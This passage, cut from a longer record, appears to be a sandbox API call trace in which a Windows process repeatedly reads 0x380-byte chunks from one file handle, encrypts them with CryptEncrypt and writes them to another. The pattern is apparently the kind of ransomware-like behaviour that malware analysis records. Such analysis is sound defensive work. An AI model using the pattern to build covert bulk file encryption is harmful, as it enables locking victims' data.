lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.662] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.662] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.662] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.662] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.662] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.662] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.662] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.662] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.662] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.662] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.663] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.663] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.663] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.663] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.663] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.663] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.663] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.663] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.663] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.663] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.663] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.663] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.663] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.664] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.664] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.664] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.664] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.664] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.664] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.664] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.664] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.664] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.664] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.664] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.664] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.665] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.665] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.665] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.665] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.665] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.665] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.665] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.665] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.665] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.665] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.665] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.665] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.666] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.666] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.666] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.666] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.666] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.666] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.666] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.666] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.666] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.666] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.666] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.666] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.666] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.667] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.667] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.667] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.667] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.667] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.667] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.667] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.667] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.667] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.667] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.667] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.667] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.668] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.668] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.668] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.668] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.668] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.668] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.668] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.668] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.668] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.668] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.668] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.668] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.668] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.668] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.669] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.669] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.669] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.669] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.669] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.669] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.669] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.669] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.669] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.669] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.669] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.669] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.669] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.669] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.670] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.670] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.673] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.674] WriteFile (in: 